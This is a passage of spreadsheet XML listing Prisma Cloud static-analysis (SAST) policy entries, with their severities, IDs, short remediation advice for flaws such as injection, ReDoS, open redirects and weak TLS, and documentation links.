          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC483" t="inlineStr">
        <is>
          <t>CKV3_SAST_50</t>
        </is>
      </c>
      <c r="AD483" t="b">
        <v>1</v>
      </c>
      <c r="AE483" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF483" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>cbaf359c-0c57-413a-815a-b85b50d8c7eb</t>
        </is>
      </c>
      <c r="AI483" t="inlineStr"/>
      <c r="AJ483" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK483" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" t="inlineStr"/>
      <c r="B484" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C484" s="2" t="inlineStr"/>
      <c r="D484" t="inlineStr"/>
      <c r="E484" t="inlineStr"/>
      <c r="F484" t="inlineStr"/>
      <c r="G484" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J484" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K484" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('Injection')</t>
        </is>
      </c>
      <c r="L484" t="inlineStr"/>
      <c r="M484" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N484" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O484" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P484" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q484" t="inlineStr"/>
      <c r="R484" t="inlineStr"/>
      <c r="S484" t="inlineStr"/>
      <c r="T484" t="b">
        <v>0</v>
      </c>
      <c r="U484" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V484" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W484" t="inlineStr">
        <is>
          <t>The application is vulnerable to malicious XSLT input, allowing attackers to execute XSL functions and perform XXE attacks. Avoid processing user-supplied XSL style sheets, and if necessary, enable FEATURE_SECURE_PROCESSING for increased security.</t>
        </is>
      </c>
      <c r="X484" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-163</t>
        </is>
      </c>
      <c r="Y484" t="inlineStr"/>
      <c r="Z484" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA484" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB484" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC484" t="inlineStr">
        <is>
          <t>CKV3_SAST_163</t>
        </is>
      </c>
      <c r="AD484" t="b">
        <v>1</v>
      </c>
      <c r="AE484" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF484" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>88cc4612-c213-47a2-a5dc-72f22a15ad74</t>
        </is>
      </c>
      <c r="AI484" t="inlineStr"/>
      <c r="AJ484" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK484" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" t="inlineStr"/>
      <c r="B485" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C485" s="2" t="inlineStr"/>
      <c r="D485" t="inlineStr"/>
      <c r="E485" t="inlineStr"/>
      <c r="F485" t="inlineStr"/>
      <c r="G485" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J485" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K485" t="inlineStr">
        <is>
          <t>Risk of regular expression denial of service</t>
        </is>
      </c>
      <c r="L485" t="inlineStr"/>
      <c r="M485" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N485" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O485" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P485" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q485" t="inlineStr"/>
      <c r="R485" t="inlineStr"/>
      <c r="S485" t="inlineStr"/>
      <c r="T485" t="b">
        <v>0</v>
      </c>
      <c r="U485" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V485" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W485" t="inlineStr">
        <is>
          <t>Ensure user input is not directly used in regular expressions without sanitization or validation. Avoid creating regex patterns that can lead to catastrophic backtracking situations. Utilize libraries or functions that escape regex metacharacters and sequences. Always sanitize and validate on the server side, not on the client-side frontend. Consider using non-backtracking regex engines such as Google's re2.</t>
        </is>
      </c>
      <c r="X485" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-76</t>
        </is>
      </c>
      <c r="Y485" t="inlineStr"/>
      <c r="Z485" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA485" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB485" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC485" t="inlineStr">
        <is>
          <t>CKV3_SAST_76</t>
        </is>
      </c>
      <c r="AD485" t="b">
        <v>1</v>
      </c>
      <c r="AE485" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF485" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>08fae02c-3612-4da5-997b-163315024b88</t>
        </is>
      </c>
      <c r="AI485" t="inlineStr"/>
      <c r="AJ485" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK485" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" t="inlineStr"/>
      <c r="B486" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C486" s="2" t="inlineStr"/>
      <c r="D486" t="inlineStr"/>
      <c r="E486" t="inlineStr"/>
      <c r="F486" t="inlineStr"/>
      <c r="G486" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J486" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K486" t="inlineStr">
        <is>
          <t>Escape markup is removed leading to risk for XSS</t>
        </is>
      </c>
      <c r="L486" t="inlineStr"/>
      <c r="M486" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N486" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O486" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P486" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q486" t="inlineStr"/>
      <c r="R486" t="inlineStr"/>
      <c r="S486" t="inlineStr"/>
      <c r="T486" t="b">
        <v>0</v>
      </c>
      <c r="U486" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V486" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W486" t="inlineStr">
        <is>
          <t>Detects \"object.escapeMarkup = false\", which can be used with some template engines to disable escaping of HTML entities.</t>
        </is>
      </c>
      <c r="X486" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-27</t>
        </is>
      </c>
      <c r="Y486" t="inlineStr"/>
      <c r="Z486" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA486" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB486" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC486" t="inlineStr">
        <is>
          <t>CKV3_SAST_27</t>
        </is>
      </c>
      <c r="AD486" t="b">
        <v>1</v>
      </c>
      <c r="AE486" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF486" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>a295bfe7-0c4f-4804-ac43-ecb31479e2ec</t>
        </is>
      </c>
      <c r="AI486" t="inlineStr"/>
      <c r="AJ486" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK486" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" t="inlineStr"/>
      <c r="B487" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C487" s="2" t="inlineStr"/>
      <c r="D487" t="inlineStr"/>
      <c r="E487" t="inlineStr"/>
      <c r="F487" t="inlineStr"/>
      <c r="G487" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J487" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K487" t="inlineStr">
        <is>
          <t>Prevent OS Command Argument Injections</t>
        </is>
      </c>
      <c r="L487" t="inlineStr"/>
      <c r="M487" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N487" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O487" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P487" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q487" t="inlineStr"/>
      <c r="R487" t="inlineStr"/>
      <c r="S487" t="inlineStr"/>
      <c r="T487" t="b">
        <v>0</v>
      </c>
      <c r="U487" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V487" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W487" t="inlineStr">
        <is>
          <t>Ensure that application code does not allow untrusted data to be used as arguments in operating system commands. This can lead to various security issues, including data leaks, denial of service, and potentially arbitrary command execution. Most tasks achievable through operating system commands can typically be accomplished using a language's native SDK. As a result, we recommend refraining from using OS commands altogether.</t>
        </is>
      </c>
      <c r="X487" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-81</t>
        </is>
      </c>
      <c r="Y487" t="inlineStr"/>
      <c r="Z487" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA487" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB487" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC487" t="inlineStr">
        <is>
          <t>CKV3_SAST_81</t>
        </is>
      </c>
      <c r="AD487" t="b">
        <v>1</v>
      </c>
      <c r="AE487" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF487" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>161351e8-6b43-4971-b5d7-6d3d8b9876b7</t>
        </is>
      </c>
      <c r="AI487" t="inlineStr"/>
      <c r="AJ487" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK487" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" t="inlineStr"/>
      <c r="B488" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C488" s="2" t="inlineStr"/>
      <c r="D488" t="inlineStr"/>
      <c r="E488" t="inlineStr"/>
      <c r="F488" t="inlineStr"/>
      <c r="G488" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J488" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K488" t="inlineStr">
        <is>
          <t>Insecure use of `eval` with non-string parameters</t>
        </is>
      </c>
      <c r="L488" t="inlineStr"/>
      <c r="M488" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N488" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O488" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P488" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q488" t="inlineStr"/>
      <c r="R488" t="inlineStr"/>
      <c r="S488" t="inlineStr"/>
      <c r="T488" t="b">
        <v>0</v>
      </c>
      <c r="U488" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V488" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W488" t="inlineStr">
        <is>
          <t>The use of \"eval\" is risky.</t>
        </is>
      </c>
      <c r="X488" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-41</t>
        </is>
      </c>
      <c r="Y488" t="inlineStr"/>
      <c r="Z488" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA488" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB488" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC488" t="inlineStr">
        <is>
          <t>CKV3_SAST_41</t>
        </is>
      </c>
      <c r="AD488" t="b">
        <v>1</v>
      </c>
      <c r="AE488" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF488" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>3b887b72-01c4-4b3a-ac10-91ed37ef9284</t>
        </is>
      </c>
      <c r="AI488" t="inlineStr"/>
      <c r="AJ488" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK488" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" t="inlineStr"/>
      <c r="B489" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C489" s="2" t="inlineStr"/>
      <c r="D489" t="inlineStr"/>
      <c r="E489" t="inlineStr"/>
      <c r="F489" t="inlineStr"/>
      <c r="G489" t="b">
        <v>1</v>
      </c>
      <c r="H4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89" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J489" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K489" t="inlineStr">
        <is>
          <t>URL redirection to untrusted site</t>
        </is>
      </c>
      <c r="L489" t="inlineStr"/>
      <c r="M489" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N489" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O489" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P489" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q489" t="inlineStr"/>
      <c r="R489" t="inlineStr"/>
      <c r="S489" t="inlineStr"/>
      <c r="T489" t="b">
        <v>0</v>
      </c>
      <c r="U489" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V489" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W489" t="inlineStr">
        <is>
          <t>Unvalidated redirects occur when an application redirects a user to a destination URL specified by a user supplied parameter that is not validated. Such vulnerabilities can be used to facilitate phishing attacks.</t>
        </is>
      </c>
      <c r="X489" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-147</t>
        </is>
      </c>
      <c r="Y489" t="inlineStr"/>
      <c r="Z489" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA489" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB489" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC489" t="inlineStr">
        <is>
          <t>CKV3_SAST_147</t>
        </is>
      </c>
      <c r="AD489" t="b">
        <v>1</v>
      </c>
      <c r="AE489" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF489" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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89" t="inlineStr">
        <is>
          <t>4e134365-0ef9-46f3-a9d4-24ced1413339</t>
        </is>
      </c>
      <c r="AI489" t="inlineStr"/>
      <c r="AJ489" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK489" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" t="inlineStr"/>
      <c r="B490" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C490" s="2" t="inlineStr"/>
      <c r="D490" t="inlineStr"/>
      <c r="E490" t="inlineStr"/>
      <c r="F490" t="inlineStr"/>
      <c r="G490" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J490" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K490" t="inlineStr">
        <is>
          <t>File Creation in Publicly Shared Directories</t>
        </is>
      </c>
      <c r="L490" t="inlineStr"/>
      <c r="M490" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N490" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O490" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P490" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q490" t="inlineStr"/>
      <c r="R490" t="inlineStr"/>
      <c r="S490" t="inlineStr"/>
      <c r="T490" t="b">
        <v>0</v>
      </c>
      <c r="U490" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V490" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W490" t="inlineStr">
        <is>
          <t>Operating systems contain global directories accessible to all users, primarily for temporary storage. Applications using these directories risk race conditions due to predictable filenames, allowing malicious users to create files first. This could lead to unauthorized access, alteration, or deletion of files, with increased risks for applications with elevated permissions.</t>
        </is>
      </c>
      <c r="X490" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-24</t>
        </is>
      </c>
      <c r="Y490" t="inlineStr"/>
      <c r="Z490" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA490" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB490" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC490" t="inlineStr">
        <is>
          <t>CKV3_SAST_24</t>
        </is>
      </c>
      <c r="AD490" t="b">
        <v>1</v>
      </c>
      <c r="AE490" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF490" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>8a26332a-b628-4dee-9a46-8f53b3750453</t>
        </is>
      </c>
      <c r="AI490" t="inlineStr"/>
      <c r="AJ490" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK490" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" t="inlineStr"/>
      <c r="B491" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C491" s="2" t="inlineStr"/>
      <c r="D491" t="inlineStr"/>
      <c r="E491" t="inlineStr"/>
      <c r="F491" t="inlineStr"/>
      <c r="G491" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J491" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K491" t="inlineStr">
        <is>
          <t>Creating temp file done with insecure permissions</t>
        </is>
      </c>
      <c r="L491" t="inlineStr"/>
      <c r="M491" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N491" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O491" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P491" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q491" t="inlineStr"/>
      <c r="R491" t="inlineStr"/>
      <c r="S491" t="inlineStr"/>
      <c r="T491" t="b">
        <v>0</v>
      </c>
      <c r="U491" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V491" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W491" t="inlineStr">
        <is>
          <t>Ensure creating temp file done with secure permissions</t>
        </is>
      </c>
      <c r="X491" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-32</t>
        </is>
      </c>
      <c r="Y491" t="inlineStr"/>
      <c r="Z491" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA491" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB491" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC491" t="inlineStr">
        <is>
          <t>CKV3_SAST_32</t>
        </is>
      </c>
      <c r="AD491" t="b">
        <v>1</v>
      </c>
      <c r="AE491" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF491" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>fdf16c72-2f78-43d7-afcc-990259ae008a</t>
        </is>
      </c>
      <c r="AI491" t="inlineStr"/>
      <c r="AJ491" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK491" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" t="inlineStr"/>
      <c r="B492" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C492" s="2" t="inlineStr"/>
      <c r="D492" t="inlineStr"/>
      <c r="E492" t="inlineStr"/>
      <c r="F492" t="inlineStr"/>
      <c r="G492" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J492" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K492" t="inlineStr">
        <is>
          <t>Unsanitized user input in template engine leading to potential code injection</t>
        </is>
      </c>
      <c r="L492" t="inlineStr"/>
      <c r="M492" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N492" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O492" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P492" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q492" t="inlineStr"/>
      <c r="R492" t="inlineStr"/>
      <c r="S492" t="inlineStr"/>
      <c r="T492" t="b">
        <v>0</v>
      </c>
      <c r="U492" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V492" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W492" t="inlineStr">
        <is>
          <t>The application may allow control over a template string. Providing user input directly in the template by dynamically creating template strings may allow an adversary to execute arbitrary Java code, including OS system commands. For Velocity, never call `evaluate` with user-supplied input in the template string.</t>
        </is>
      </c>
      <c r="X492" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-112</t>
        </is>
      </c>
      <c r="Y492" t="inlineStr"/>
      <c r="Z492" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA492" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB492" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC492" t="inlineStr">
        <is>
          <t>CKV3_SAST_112</t>
        </is>
      </c>
      <c r="AD492" t="b">
        <v>1</v>
      </c>
      <c r="AE492" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF492" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>cc29a9eb-e3ca-4897-8b48-a2986744e06f</t>
        </is>
      </c>
      <c r="AI492" t="inlineStr"/>
      <c r="AJ492" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK492" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" t="inlineStr"/>
      <c r="B493" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C493" s="2" t="inlineStr"/>
      <c r="D493" t="inlineStr"/>
      <c r="E493" t="inlineStr"/>
      <c r="F493" t="inlineStr"/>
      <c r="G493" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J493" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K493" t="inlineStr">
        <is>
          <t>TLS Weak Version</t>
        </is>
      </c>
      <c r="L493" t="inlineStr"/>
      <c r="M493" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N493" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O493" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P493" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q493" t="inlineStr"/>
      <c r="R493" t="inlineStr"/>
      <c r="S493" t="inlineStr"/>
      <c r="T493" t="b">
        <v>0</v>
      </c>
      <c r="U493" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V493" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W493" t="inlineStr">
        <is>
          <t>TLS versions 1.1 and 1.0 were deprecated by the IETF in June 2018 due to a number of attacks against the vulnerable versions. Use of a deprecated TLS version may result in the unauthorized retrieval of sensitive information. It is strongly recommended that all TLS connectionsuse TLS 1.3 as Go will automatically choose the most secure cipher when negotiating the TLS handshake with client or servers.</t>
        </is>
      </c>
      <c r="X493" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-247</t>
        </is>
      </c>
      <c r="Y493" t="inlineStr"/>
      <c r="Z493" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA493" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB493" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC493" t="inlineStr">
        <is>
          <t>CKV3_SAST_247</t>
        </is>
      </c>
      <c r="AD493" t="b">
        <v>1</v>
      </c>
      <c r="AE493" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF493" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>aeb8f9e6-91a0-41ea-9e34-f65906020de5</t>
        </is>
      </c>
      <c r="AI493" t="inlineStr"/>
      <c r="AJ493" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK493" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" t="inlineStr"/>
